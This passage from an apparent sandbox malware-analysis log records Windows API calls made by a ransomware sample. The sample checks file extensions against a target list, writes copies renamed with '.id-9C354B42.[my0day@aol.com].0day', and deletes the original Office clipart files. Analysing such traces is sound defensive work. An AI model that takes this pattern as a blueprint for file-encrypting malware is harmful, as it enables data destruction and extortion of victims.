lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xe10, lpOverlapped=0x0) returned 1 [0273.982] ReadFile (in: hFile=0x380, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.985] WriteFile (in: hFile=0x37c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.985] SetEndOfFile (hFile=0x37c) returned 1 [0273.985] CloseHandle (hObject=0x37c) returned 1 [0273.985] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.985] SetEndOfFile (hFile=0x380) returned 1 [0273.990] CloseHandle (hObject=0x380) returned 1 [0273.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.991] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf")) returned 1 [0273.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0273.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0273.991] lstrlenW (lpString=".doc") returned 4 [0273.991] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.991] lstrlenW (lpString=".docx") returned 5 [0273.991] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.991] lstrlenW (lpString=".pdf") returned 4 [0273.991] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.991] lstrlenW (lpString=".xls") returned 4 [0273.991] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.991] lstrlenW (lpString=".xlsx") returned 5 [0273.991] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.991] lstrlenW (lpString=".ppt") returned 4 [0273.991] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0273.991] lstrlenW (lpString=".zip") returned 4 [0273.991] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.991] lstrlenW (lpString=".rar") returned 4 [0273.991] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.991] lstrlenW (lpString=".bz2") returned 4 [0273.991] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.992] lstrlenW (lpString=".7z") returned 3 [0273.992] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0273.992] lstrlenW (lpString=".dbf") returned 4 [0273.992] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0273.992] lstrlenW (lpString=".1cd") returned 4 [0273.992] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0273.992] lstrlenW (lpString=".jpg") returned 4 [0273.992] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0273.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0273.992] lstrlenW (lpString=".doc") returned 4 [0273.992] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.992] lstrlenW (lpString=".docx") returned 5 [0273.992] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.992] lstrlenW (lpString=".pdf") returned 4 [0273.992] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.992] lstrlenW (lpString=".xls") returned 4 [0273.992] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.992] lstrlenW (lpString=".xlsx") returned 5 [0273.992] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.992] lstrlenW (lpString=".ppt") returned 4 [0273.992] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0273.992] lstrlenW (lpString=".zip") returned 4 [0273.992] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.992] lstrlenW (lpString=".rar") returned 4 [0273.992] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.992] lstrlenW (lpString=".bz2") returned 4 [0273.992] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.992] lstrlenW (lpString=".7z") returned 3 [0273.993] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0273.993] lstrlenW (lpString=".dbf") returned 4 [0273.993] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0273.993] lstrlenW (lpString=".1cd") returned 4 [0273.993] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0273.993] lstrlenW (lpString=".jpg") returned 4 [0273.993] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.993] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.993] lstrlenW (lpString="DD01162_.WMF") returned 12 [0273.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.993] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2300) returned 1 [0273.994] CloseHandle (hObject=0x380) returned 1 [0273.994] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf")) returned 0x20 [0273.994] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.994] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.994] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.994] GetLastError () returned 0x0 [0273.994] ReadFile (in: hFile=0x380, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x8fc, lpOverlapped=0x0) returned 1 [0273.998] WriteFile (in: hFile=0x37c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x900, lpOverlapped=0x0) returned 1 [0273.999] ReadFile (in: hFile=0x380, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.999] WriteFile (in: hFile=0x37c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.999] SetEndOfFile (hFile=0x37c) returned 1 [0273.999] CloseHandle (hObject=0x37c) returned 1 [0273.999] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.999] SetEndOfFile (hFile=0x380) returned 1 [0274.002] CloseHandle (hObject=0x380) returned 1 [0274.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.052] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf")) returned 1 [0274.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0274.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0274.052] lstrlenW (lpString=".doc") returned 4 [0274.052] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.052] lstrlenW (lpString=".docx") returned 5 [0274.052] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.052] lstrlenW (lpString=".pdf") returned 4 [0274.052] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.052] lstrlenW (lpString=".xls") returned 4 [0274.052] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.052] lstrlenW (lpString=".xlsx") returned 5 [0274.052] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.052] lstrlenW (lpString=".ppt") returned 4 [0274.052] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0274.052] lstrlenW (lpString=".zip") returned 4 [0274.052] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.052] lstrlenW (lpString=".rar") returned 4 [0274.052] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.052] lstrlenW (lpString=".bz2") returned 4 [0274.053] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.053] lstrlenW (lpString=".7z") returned 3 [0274.053] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0274.053] lstrlenW (lpString=".dbf") returned 4 [0274.053] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0274.053] lstrlenW (lpString=".1cd") returned 4 [0274.053] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0274.053] lstrlenW (lpString=".jpg") returned 4 [0274.053] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0274.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0274.053] lstrlenW (lpString=".doc") returned 4 [0274.053] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.053] lstrlenW (lpString=".docx") returned 5 [0274.053] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.053] lstrlenW (lpString=".pdf") returned 4 [0274.053] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.053] lstrlenW (lpString=".xls") returned 4 [0274.053] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.053] lstrlenW (lpString=".xlsx") returned 5 [0274.053] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.053] lstrlenW (lpString=".ppt") returned 4 [0274.053] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0274.053] lstrlenW (lpString=".zip") returned 4 [0274.053] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.053] lstrlenW (lpString=".rar") returned 4 [0274.053] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.053] lstrlenW (lpString=".bz2") returned 4 [0274.053] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.053] lstrlenW (lpString=".7z") returned 3 [0274.053] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0274.054] lstrlenW (lpString=".dbf") returned 4 [0274.054] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0274.054] lstrlenW (lpString=".1cd") returned 4 [0274.054] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0274.054] lstrlenW (lpString=".jpg") returned 4 [0274.054] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.054] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.054] lstrlenW (lpString="DD01166_.WMF") returned 12 [0274.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0274.071] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2080) returned 1 [0274.071] CloseHandle (hObject=0x384) returned 1 [0274.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf")) returned 0x20 [0274.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0274.633] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.633] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0274.634] GetLastError () returned 0x0 [0274.634] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x820, lpOverlapped=0x0) returned 1 [0274.642] WriteFile (in: hFile=0x3a4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x830, lpOverlapped=0x0) returned 1 [0274.643] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.643] WriteFile (in: hFile=0x3a4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.643] SetEndOfFile (hFile=0x3a4) returned 1 [0274.705] CloseHandle (hObject=0x3a4) returned 1 [0274.705] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.705] SetEndOfFile (hFile=0x384) returned 1 [0274.786] CloseHandle (hObject=0x384) returned 1 [0274.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.787] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf")) returned 1 [0274.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0274.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0274.787] lstrlenW (lpString=".doc") returned 4 [0274.787] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.787] lstrlenW (lpString=".docx") returned 5 [0274.787] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.787] lstrlenW (lpString=".pdf") returned 4 [0274.787] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.787] lstrlenW (lpString=".xls") returned 4 [0274.787] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.787] lstrlenW (lpString=".xlsx") returned 5 [0274.787] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.787] lstrlenW (lpString=".ppt") returned 4 [0274.787] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0274.787] lstrlenW (lpString=".zip") returned 4 [0274.787] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.787] lstrlenW (lpString=".rar") returned 4 [0274.787] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.787] lstrlenW (lpString=".bz2") returned 4 [0274.787] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.787] lstrlenW (lpString=".7z") returned 3 [0274.787] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0274.787] lstrlenW (lpString=".dbf") returned 4 [0274.788] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0274.788] lstrlenW (lpString=".1cd") returned 4 [0274.788] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0274.788] lstrlenW (lpString=".jpg") returned 4 [0274.788] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0274.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0274.788] lstrlenW (lpString=".doc") returned 4 [0274.788] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.788] lstrlenW (lpString=".docx") returned 5 [0274.788] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.788] lstrlenW (lpString=".pdf") returned 4 [0274.788] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.788] lstrlenW (lpString=".xls") returned 4 [0274.788] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.788] lstrlenW (lpString=".xlsx") returned 5 [0274.788] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.788] lstrlenW (lpString=".ppt") returned 4 [0274.788] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0274.788] lstrlenW (lpString=".zip") returned 4 [0274.788] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.788] lstrlenW (lpString=".rar") returned 4 [0274.788] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.788] lstrlenW (lpString=".bz2") returned 4 [0274.788] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.788] lstrlenW (lpString=".7z") returned 3 [0274.788] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0274.788] lstrlenW (lpString=".dbf") returned 4 [0274.788] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0274.789] lstrlenW (lpString=".1cd") returned 4 [0274.789] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0274.789] lstrlenW (lpString=".jpg") returned 4 [0274.789] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.789] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.789] lstrlenW (lpString="DD01434_.WMF") returned 12 [0274.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0274.836] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=900) returned 1 [0274.836] CloseHandle (hObject=0x3a8) returned 1 [0274.836] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf")) returned 0x20 [0274.836] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0274.836] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.836] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.837] GetLastError () returned 0x0 [0274.837] ReadFile (in: hFile=0x3a8, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x384, lpOverlapped=0x0) returned 1 [0274.864] WriteFile (in: hFile=0x318, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x390, lpOverlapped=0x0) returned 1 [0274.865] ReadFile (in: hFile=0x3a8, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.865] WriteFile (in: hFile=0x318, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.865] SetEndOfFile (hFile=0x318) returned 1 [0274.865] CloseHandle 